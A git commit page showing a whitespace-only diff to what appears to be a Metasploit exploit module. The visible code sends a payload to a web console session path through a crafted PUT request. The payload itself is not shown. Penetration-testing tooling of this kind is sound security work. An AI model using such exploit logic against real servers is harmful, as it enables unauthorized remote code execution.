Clean up various whitespace
parent
3300bcc5cb
commit
8b04eaaa60
|
@ -45,13 +45,13 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
#
|
||||
def exploit
|
||||
|
||||
res = send_request_cgi({
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path),
|
||||
'method' => 'GET'
|
||||
}, 25)
|
||||
|
||||
if ! res
|
||||
print_error("Error: No response requesting #{datastore['TARGETURI']}")
|
||||
print_error("Error: No response requesting #{datastore['TARGETURI']}")
|
||||
return
|
||||
end
|
||||
|
||||
|
@ -75,10 +75,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
print_status("Sending payload to #{console_path}/#{session_id}")
|
||||
res = send_request_cgi({
|
||||
'uri' => console_path + "/" + session_id,
|
||||
'method' => 'PUT',
|
||||
'headers' => {
|
||||
'Accept' => 'application/vnd.web-console.v2',
|
||||
'uri' => console_path + "/" + session_id,
|
||||
'method' => 'PUT',
|
||||
'headers' => {
|
||||
'Accept' => 'application/vnd.web-console.v2',
|
||||
'X-Requested-With' => 'XMLHttpRequest'
|
||||
},
|
||||
'vars_post' => {
|
||||
|
|
Loading…
Reference in New Issue